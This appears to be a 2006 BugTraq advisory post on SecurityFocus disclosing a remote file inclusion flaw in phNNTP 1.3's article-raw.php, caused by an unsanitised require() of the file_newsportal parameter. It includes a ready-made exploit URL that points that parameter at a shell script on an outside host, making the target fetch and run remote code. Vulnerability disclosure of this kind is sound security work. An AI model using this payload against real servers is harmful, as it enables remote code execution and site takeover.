BugTraq
phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability Aug 08 2006 05:13PM
tr_zindan wolfsecurity org
phNNTP v1.3 Remote File Inclusion

CreW: ToxiC

By:Tr_ZiNDaN

mail:tr_zindan (at) wolfsecurity (dot) org [email concealed]

Source Code:

http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz

Problem Is:

require("$file_newsportal");

Page Affect:

article-raw.php

Path:

Declare file_newsportal

ExPLoit:

http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://ww
w.evalsite.com/shell.php?

Greatz: WolfSecurtyTeam,EL_MuHaMMED,CyberWolf...

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus